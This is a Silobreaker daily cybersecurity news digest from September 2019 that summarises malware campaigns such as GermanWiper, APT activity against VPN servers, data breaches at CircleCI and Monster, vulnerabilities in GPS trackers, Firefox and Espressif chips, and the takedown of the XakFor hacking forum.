Silobreaker Daily Cyber Digest – 06 September 2019
Researchers publish analysis of GermanWiper malware
- GermanWiper malware is distributed via a spam email campaign in Germany. The attacker sends spear phishing emails pretending to be a job application, with a compressed file attachment said to contain a PDF file of the applicant’s resume. Instead, the file is a LNK shortcut file that executes a PowerShell command, which downloads and executes an HTA file, which in turn downloads the GermanWiper payload.
- The malware pretends to be ransomware, however, in reality it is a data-wiping malware that destroys data instead of encrypting it.
- A full technical analysis is available on Carbon Black’s website.
Source (Includes IOCs)
Cloned university websites target students ahead of academic year
- Researchers at Proofpoint identified a spike in phishing attacks directed against students. The campaigns are typically of medium volume, sending out tens of thousands of messages containing html attachments to students everyday.
- Targets who access the malicious attachment are redirected to fake library or student management portal sites. The spoofed websites contain fake branding and other social engineering tactics.
- The researchers also warned that the Silent Librarian group continue to pose a threat to students. Indicted by the FBI, the group carry out phishing attacks that impersonate university library administration, using stolen credentials to steal and resell intellectual property such as journal subscription accounts.
Spam campaign uses compromised devices to forward malicious PHP scripts
- Researchers at Trend Micro identified a spam campaign targeting UK based users with a cryptocurrency scam. The campaign begins by gaining SSH access to devices via brute force attacks. Following the compromise, an attacker sends a base64 encoded PHP script to web servers, which then delivers an email with a link to a scam site to a specific recipient.
- Users who click on the link are sent to sites which spoof legitimate news outlets. The campaign is targeted against users who may be looking for jobs or extra income. A victim who clicks on any link on the malicious page will be redirected to a cryptocurrency scam site where they will be asked to pay $250 as ‘seed money’.
- The researchers stated that the probable use of a PHP web shell and functions would allow attackers to access servers again regardless if a patch was applied. Trend Micro also stated that the attackers could use the spam botnet’s routine to spread malware to more systems and vulnerable servers.
APT5 target Vulnerabilities in Fortinet and Pulse Secure VPN servers
- ZDNet reported that Chinese-state sponsored group APT5 have been engaged in attacks against Fortinet and Pulse Secure VPN servers. The vulnerabilities, tracked as CVE-2018-13379 and CVE-2019-11510, were revealed last month. Both vulnerabilities allow an attacker to retrieve files which store information such as passwords or VPN session data from affected products.
- An umbrella group of APT5 has established infrastructure to scan for exposed VPN servers as of August 2019. The group were among the first to begin scanning for, and attempting to exploit the vulnerabilities.
- ZDNet’s source observed APT5’s attacks but stated that they were not in a position to determine if the attacks were successful.
Chinese state-sponsored group APT3 steal and repurpose NSA cyber tool
- Researchers at Check Point discovered that artefacts of the EternalRomance tool, used by NSA cyber unit Equation Group, were captured by Chinese group APT3. The Chinese group went on to adapt EternalRomance to create the Bemstour tool.
- The researchers stated that it was likely that APT3 captured the artefacts when it was used against their own computers. Check Point research Mark Lechtik speculated that the Chinese had deliberately baited the NSA to gain access to the tool.
Leaks and Breaches
CircleCI suffers data breach through third party vendor
- On September 4th, 2019, CircleCI released a statement revealing that customer data had been exposed through a third-party analytics vendor. The company stated that they became aware of the attack on August 31st, 2019.
- CircleCI revealed that they believe that affected customers accessed the platform between June 30th, 2019 and August 31st, 2019. Exposed data includes usernames, email addresses associated with Bitbucket and Github, IP addresses, and more. Information that was potentially exposed includes repository URLs and names, branch names, repository owners, and organization names.
Personal data of Monster users exposed on web server
- An exposed web server containing resumes and CVs of job applicants was found online. The server reportedly belonged to a recruitment customer Monster Worldwide had previously worked with, and some of the exposed data includes that of Monster users. Thousands of resumes were found in a folder dated May 2017, however the exact number of exposed files remains unclear.
- The exposed data was mostly from users located in the US and dates from 2014 to 2017. Exposed private data included phone numbers, home addresses, and email addresses, and in some cases immigration documentation for work. According to TechCrunch, the data is no longer accessible via the web server, however, some can still be found in cached results.
- Monster notified the owner of the server after being informed of the leak by a security researcher. According to Monster, the recruitment customer company is responsible for informing affected users, as Monster is ‘not in a position’ to identify affected users.
Private data of 13,905 Artesia General Hospital patients potentially exposed in data breach
- The data breach at Artesia General Hospital in New Mexico was discovered on June 18th, 2019 and was the result of a phishing attack on an employee email account.
- Potentially exposed data includes patient names, dates of birth, patient account numbers, medical record numbers, health insurance information, and more. In some cases, Social Security numbers may also have been exposed. To date, no evidence of data theft was found.
DK-LOK internal and external emails exposed in database leak
- Researchers at vpnMentor identified an unprotected and unencrypted Elasticsearch database in the email platform used by industrial pipe, valve, and fitting manufacturer, DK-LOK. The breach reveals information from various DK-LOK branches and also the information of numerous international clients.
- Exposed information included product prices, project bids, private conversations, and discussions on suppliers, clients, internal operations and projects. The breach also exposed employee and client details such as names, email addresses, personal conversations, and more.
- vpnMentor made several attempts to alert the company but these have been ignored. As the database continues to leak the researchers can see that the company have received the emails.
Multiple security flaws found in child GPS trackers
- Security researchers at Avast identified vulnerabilities in 29 GPS trackers produced by the Chinese manufacturer Shenzhen i365 Tech. The researchers analyzed a T8 Mini Child Tracker which allows for GPS tracking and two-way communication capabilities.
- Users are asked to login to an HTTP form with a default password ‘123456’ and a user ID which is based on the GPS tracker’s International Mobile Equipment Identity (IMEI) code. An attacker can easily scan through IMEI numbers and enter the default password to gain access to the tracker. The researchers identified at least 600,000 devices that are live in the wild with default passwords.
- Successful attackers could lock the device, acquire the users phone number, spy on users and spoof the devices location.
WordPress 5.2.3 release patches vulnerabilities
- On September 5th, 2019, WordPress 5.2.3 was released, the new version fixes six vulnerabilities and twenty-nine bugs or enhancements.
- Five of the flaws are XSS vulnerabilities and one is an open redirect vulnerability. All vulnerabilities were discovered by third party researchers. A full list of changes and security fixes is available via WordPress.
Critical security vulnerability fixed in Mozilla Firefox 69
- The critical vulnerability discovered by iDefense Labs and tracked as CVE-2019-11751 can cause malicious code execution through code line parameters. The issue is caused by a failure to properly sanitize logging related command line parameters when Firefox is launched by another program. The issue only affects instances of Firefox running on Windows operating systems.
Three vulnerabilities found in Espressif chips
- The three vulnerabilities affect the Espressif ESP32 and ESP8266 chips. Two of the vulnerabilities, tracked as CVE-2019-12588 and CVE-2019-12586, allow attackers to cause a denial of service that could crash devices within radio range. CVE-2019-12588 only affects ESP8266 Wi-Fi devices.
- The other flaw, tracked as CVE-2019-12587, is found in the SDKs of the devices and could allow an attacker to install a zero Pairwise Master Key (PMK), which in turn allows an attacker in radio range to replay, decrypt or spoof frames via a rogue access point, enabling them to steal session keys, usernames and passwords.
- As the PMK is initialized as zero when an ESP device starts, an attacker could exploit CVE-2019-12588 and CVE-2019-12586 in combination with the third flaw to increase damage. Espressif has released patches for all vulnerabilities.
Cybercriminals adopt malware name given by researchers
- In July 2019 CrowdStrike researchers reported on a new variant of BitPaymer ransomware which they dubbed DoppelPaymer malware. The researchers suggested that DopplePaymer was created by a member of INDRIK SPIDER who originally created BitPaymer.
- Following CrowdStrike’s report the developers behind DopplePaymer adopted the name and now display it on their Tor payment site.
Hong Kong Stock Exchange website hit by DDoS attack
- The website was hit by a distributed denial-of-service attack while Hong Kong Exchanges and Clearing Limited (HKEX) was halting derivatives transactions to fix an unrelated vulnerability in its vendor-supplied trading platform.
- The DDoS attack disrupted the website’s ability to display exchange prices and financial data, whilst the software flaw affected derivative financial products. An older version not containing the vulnerability is now used on the HKEX’s website instead and normal service has resumed.
NSA Cybersecurity Directorate to focus on ransomware
- According to Anne Neuberger, director of the newly established US National Security Agency (NSA) Cybersecurity Directorate, there are about 4,000 ransomware attacks on a daily basis, which is why ransomware will be the focus for the directorate. Other threats the directorate will be focusing on are ones from nation-state actors, such as election influencing or information theft.
Belarusian authorities shut own hacking forum
- The Belarusian Ministry of Internal Affairs announced that the Belarusian police shut down Russian-speaking hacker forum XakFor. The forum was hosted in Belarus, launched in 2012, had 28,000 registered accounts and operated on the open web.
- XakFor was primarily populated by low-skilled hackers and provided access to malware which could be purchased or downloaded for free.
The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.